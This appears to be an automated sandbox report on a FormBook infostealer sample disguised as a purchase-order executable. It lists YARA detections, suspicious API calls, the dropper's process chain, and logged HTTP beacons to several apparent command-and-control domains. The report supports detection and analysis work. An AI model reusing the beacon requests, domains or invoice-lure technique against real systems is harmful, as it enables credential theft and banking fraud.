Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tommy57.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.700544.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.porggiret.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tobewell.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.new-thinking.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.ybkos.linkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.bookmygennie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.amspustaka.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.spirituallyzen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_0024ACE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,

Source: rubthqnwyfue.exe, 00000004.00000000.330517070.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe

Code function: 1_2_0024B870 GetKeyboardState,

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: jaxdij.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: New PO-RJ-IN-003 - Knauf Queimados.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: jaxdij.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Code function: 0_2_00406333
Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Code function: 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_002418D0
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0025A9EA
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_00243520
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_0024C500
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 1_2_00248EB0
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_002418D0
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0025A9EA
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00243520
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0024C500
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00248EB0
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00421898
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004221DA
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004229BB
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004222FF
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040B442
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040B447
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0042140D
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004044C5
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0040FE77
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_00422601
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004046E7

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: String function: 0024D940 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: String function: 002525B4 appears 36 times

Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041E097 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DEB7 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DF67 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DFE7 NtClose,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_004014E9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DEB1 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DF61 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DF09 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Code function: 2_2_0041DFE1 NtClose,

Source: New PO-RJ-IN-003 - Knauf Queimados.exe

ReversingLabs: Detection: 27%

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

File read: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Jump to behavior

Source: New PO-RJ-IN-003 - Knauf Queimados.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe	Process created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
Source: C:\Users\user\AppData\Local\Temp\jaxdij.exe	Process created: C:\Users\user\AppData\Local\Temp\jaxdij.exe "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
